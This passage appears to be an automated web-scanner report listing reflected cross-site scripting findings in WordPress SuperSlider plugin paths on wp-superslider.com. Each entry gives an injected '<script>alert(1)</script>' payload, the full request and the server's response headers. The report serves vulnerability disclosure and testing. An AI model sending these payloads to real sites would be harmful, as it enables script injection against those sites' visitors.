Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eca9c"><script>alert(1)</script>1f4a2f0771d was submitted in the REST URL parameter 7. This input was echoed as eca9c\"><script>alert(1)</script>1f4a2f0771d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShoweca9c"><script>alert(1)</script>1f4a2f0771d/lightbox/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367d7"><script>alert(1)</script>a6f2c5f9e26 was submitted in the REST URL parameter 8. This input was echoed as 367d7\"><script>alert(1)</script>a6f2c5f9e26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox367d7"><script>alert(1)</script>a6f2c5f9e26/lightbox.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674579+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e566"><script>alert(1)</script>d02d1ba07b1 was submitted in the REST URL parameter 9. This input was echoed as 1e566\"><script>alert(1)</script>d02d1ba07b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/lightbox/lightbox.css1e566"><script>alert(1)</script>d02d1ba07b1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d8eb"><script>alert(1)</script>9e15b3b1081 was submitted in the REST URL parameter 1. This input was echoed as 1d8eb\"><script>alert(1)</script>9e15b3b1081 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site1d8eb"><script>alert(1)</script>9e15b3b1081/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a721"><script>alert(1)</script>4e05a494985 was submitted in the REST URL parameter 2. This input was echoed as 3a721\"><script>alert(1)</script>4e05a494985 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content3a721"><script>alert(1)</script>4e05a494985/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24702"><script>alert(1)</script>57503f72f04 was submitted in the REST URL parameter 3. This input was echoed as 24702\"><script>alert(1)</script>57503f72f04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins24702"><script>alert(1)</script>57503f72f04/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c140b"><script>alert(1)</script>1f6a60dc002 was submitted in the REST URL parameter 4. This input was echoed as c140b\"><script>alert(1)</script>1f6a60dc002 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimboxc140b"><script>alert(1)</script>1f6a60dc002/plugin-data/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:27 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7c08"><script>alert(1)</script>ae9dcdd351a was submitted in the REST URL parameter 5. This input was echoed as d7c08\"><script>alert(1)</script>ae9dcdd351a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-datad7c08"><script>alert(1)</script>ae9dcdd351a/superslider/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674549+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4ae"><script>alert(1)</script>c312e4104fa was submitted in the REST URL parameter 6. This input was echoed as 7c4ae\"><script>alert(1)</script>c312e4104fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider7c4ae"><script>alert(1)</script>c312e4104fa/ssSlimbox/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3335"><script>alert(1)</script>80926a060b5 was submitted in the REST URL parameter 7. This input was echoed as c3335\"><script>alert(1)</script>80926a060b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimboxc3335"><script>alert(1)</script>80926a060b5/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674553+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eca7"><script>alert(1)</script>5a311d7dae7 was submitted in the REST URL parameter 8. This input was echoed as 9eca7\"><script>alert(1)</script>5a311d7dae7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default9eca7"><script>alert(1)</script>5a311d7dae7/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:35 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674555+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbe4c"><script>alert(1)</script>dc71eef9483 was submitted in the REST URL parameter 9. This input was echoed as fbe4c\"><script>alert(1)</script>dc71eef9483 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-slimbox/plugin-data/superslider/ssSlimbox/default/default.cssfbe4c"><script>alert(1)</script>dc71eef9483 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674560+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674560; expires=Thu, 02-Feb-2012 19:22:40 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fcf"><script>alert(1)</script>8b6006bf31 was submitted in the REST URL parameter 1. This input was echoed as 29fcf\"><script>alert(1)</script>8b6006bf31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site29fcf"><script>alert(1)</script>8b6006bf31/wp-content/plugins/superslider/js/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674534+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674534; expires=Thu, 02-Feb-2012 19:22:14 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9adac"><script>alert(1)</script>8768e1887b4 was submitted in the REST URL parameter 2. This input was echoed as 9adac\"><script>alert(1)</script>8768e1887b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content9adac"><script>alert(1)</script>8768e1887b4/plugins/superslider/js/zoomer.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674535+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674535; expires=Thu, 02-Feb-2012 19:22:15 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:15 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
